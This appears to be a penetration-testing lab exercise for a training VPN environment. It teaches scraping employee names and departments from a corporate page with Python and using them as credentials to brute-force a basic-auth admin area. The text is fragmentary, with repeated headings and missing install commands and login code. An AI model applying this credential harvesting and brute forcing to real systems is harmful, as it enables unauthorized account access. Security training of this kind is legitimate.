Lab7 - Python Assisted Exploitation
Lab7 - Python Assisted Exploitation
Lab7 - Python Assisted Exploitation
Using the provided VPN file, connect to the virtual environment. Then, navigate to
http://172.16.120.120 and go through it to identify any functionality.
It is not uncommon to come across an employee’s name being used as a username. It is also
not uncommon to see an employee’s department being used as a password. Corporate sites
usually include these pieces of information.
Collecting such information by hand, can be a tedious procedure. So, use Python to collect
them (scrape them) and also create a brute-forcing script that will use the collected
information as credentials. Use the brute-forcing script against the Admin Area.
Use openvpn and download the configuration file to connect to the lab. Once connected,
navigate to 172.16.120.120:
The page contains a table with some employee names and the respective departments of the
company they are working in. Also, at the bottom of the page, you can find a link to the
“Admin Area,” which is protected by basic authentication.
Browsers recognize this type of authentication and display a login screen to the user when
encountered, which is similar to what you see upon browsing to the admin area. This way,
the user does not have to even know about the existence of an additional header, and can
simply log in in a convenient way.
In order to use suggested libraries, specifically requests and BeautifulSoup, you will need
to install them. To install Python libraries, you should use a Python package manager called
“pip”. It comes preinstalled with the latest Kali Linux and is available via the command line.
To install the aforementioned libraries, issue the following commands in the terminal:
For requests:
For BeautifulSoup:
import requests
from bs4 import BeautifulSoup as bs4
#this means, that we want to import the BeautifulSoup module which is part of
#the bs4 library, and that we want to refer to it in our code as bs4.
#So whenever we use bs4.[something], we refer to some part of the
#BeautifulSoup module.
It is recommended to divide the program into smaller functions in order to keep similar
functionalities together.
Let’s start with writing a function that downloads the target page content:
Next, let’s create a function that processes the web page content and extracts interesting
information.
In this case, we will create two very similar functions in order to extract the names of the
employees and the names of the departments:
def findDepts(response):
parser = bs4(response, 'html.parser')
names = parser.find_all('td', id='department')
output = []
for name in names:
output.append(name.text)
return output
Now, let’s create a function that sends a request to admin.php containing login credentials:
import requests
from bs4 import BeautifulSoup as bs4
def downloadPage(url):
r = requests.get(url)
response = r.content
return response
def findNames(response):
parser = bs4(response, 'html.parser')
names = parser.find_all('td', id='name')
output = []
for name in names:
output.append(name.text)
return output
def findDepts(response):
parser = bs4(response, 'html.parser')
names = parser.find_all('td', id='department')
output = []
for name in names:
output.append(name.text)
return output
names = findNames(page)
uniqNames = sorted(set(names))
depts = findDepts(page)
uniqDepts = sorted(set(depts))